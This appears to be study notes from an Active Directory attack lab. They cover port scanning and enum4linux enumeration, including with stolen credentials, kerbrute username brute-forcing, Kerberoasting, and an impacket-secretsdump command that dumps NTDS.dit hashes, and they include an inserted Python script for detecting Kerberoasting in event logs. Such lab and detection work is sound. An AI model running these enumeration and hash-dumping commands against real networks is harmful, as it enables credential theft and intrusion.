Determine what ports are open
  Determine open ports
  Scan ports with Nmap to fingerprint services
Enumerate AD information
  Get a list of users
  If a list is not available, bruteforce usernames
  Determine whether Kerberos pre-authentication is in place
  Determine which users have SPNs (Service Principal Names)
enum4linux: used to enumerate a huge amount of AD information from the command line.
enum4linux -a 10.1.1.10 # Attempts to enumerate everything at the target
enum4linux -u administrator -p password -U 10.1.1.10 # Use stolen creds to enumerate all users
enum4linux -S 10.1.1.10 # Attempt to gather SMB shares
Used to enumerate information about the system over RPC.
Kerbrute, used to run various Kerberos attacks. Written in Go. https://github.com/ropnop/kerbrute
./kerbrute_linux_amd64 userenum --dc 10.10.107.154 -d spookysec.local ../userlist.txt
Using a valid account on a pwned box, we can request tickets for service accounts and extract the hash to crack offline. We must first find all accounts in AD which have an SPN (Service Principal Name), then request RC4 tickets for them from the DC.
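From the defender's side, the RC4 ticket requests described above are what make this technique visible: a DC logs each TGS request as Security event 4769 with the ticket encryption type (0x17 is RC4-HMAC), so one account pulling RC4 tickets for several distinct user-backed SPNs in a short window is the classic signal. The script below is an added example, not from the original notes or any tool named here; the log lines are constructed samples in a simplified key=value form rather than a real Windows export, and the usernames, SPNs and IPs are made up.

```python
"""Added detection sketch for Kerberoasting: flag event 4769 records where the
ticket encryption type is RC4-HMAC (0x17) and the service is a user account
rather than a machine account (name ends in $) or krbtgt, then group by requester."""

# Constructed sample events in "key=value" form (not a real Windows export).
SAMPLE_4769 = """\
EventID=4769 TargetUserName=alice@SPOOKYSEC.LOCAL ServiceName=svc-sql TicketEncryptionType=0x17 IpAddress=10.10.14.22 Status=0x0
EventID=4769 TargetUserName=alice@SPOOKYSEC.LOCAL ServiceName=svc-web TicketEncryptionType=0x17 IpAddress=10.10.14.22 Status=0x0
EventID=4769 TargetUserName=alice@SPOOKYSEC.LOCAL ServiceName=svc-backup TicketEncryptionType=0x17 IpAddress=10.10.14.22 Status=0x0
EventID=4769 TargetUserName=bob@SPOOKYSEC.LOCAL ServiceName=WS01$ TicketEncryptionType=0x17 IpAddress=10.10.14.31 Status=0x0
EventID=4769 TargetUserName=bob@SPOOKYSEC.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.14.31 Status=0x0
EventID=4769 TargetUserName=carol@SPOOKYSEC.LOCAL ServiceName=svc-sql TicketEncryptionType=0x12 IpAddress=10.10.14.40 Status=0x0
EventID=4624 TargetUserName=carol@SPOOKYSEC.LOCAL IpAddress=10.10.14.40
"""

RC4_HMAC = "0x17"  # encryption type requested by classic Kerberoasting tooling

def parse_event(line):
    """Split one 'key=value key=value' record into a dict."""
    fields = {}
    for token in line.split():
        key, _, value = token.partition("=")
        fields[key] = value
    return fields

def is_roastable_service(service):
    """User-backed SPN: not a machine account (ends with $) and not krbtgt."""
    return bool(service) and not service.endswith("$") and service.lower() != "krbtgt"

def rc4_tgs_requests(log_text):
    """Return the successful 4769 events that look like Kerberoasting candidates."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
            continue
        if ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        if is_roastable_service(ev.get("ServiceName", "")):
            hits.append(ev)
    return hits

def flag_requesters(log_text, threshold=3):
    """Group RC4 hits by (requesting user, source IP); alert when one requester
    pulled RC4 tickets for at least `threshold` distinct user SPNs."""
    spns = {}
    for ev in rc4_tgs_requests(log_text):
        key = (ev["TargetUserName"], ev["IpAddress"])
        spns.setdefault(key, set()).add(ev["ServiceName"])
    return {k: sorted(v) for k, v in spns.items() if len(v) >= threshold}

if __name__ == "__main__":
    for (user, ip), services in flag_requesters(SAMPLE_4769).items():
        print(f"ALERT {user} from {ip} requested RC4 tickets for {len(services)} SPNs: {', '.join(services)}")
```

In the sample data only alice trips the rule; bob's RC4 request is for a machine account and carol's requests use AES (0x12), so both are filtered out before counting.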
Used to extract hashes from a server. The command below dumps the NTDS.dit contents, assuming you have an account with the required permissions.
impacket-secretsdump -just-dc backup:[email protected]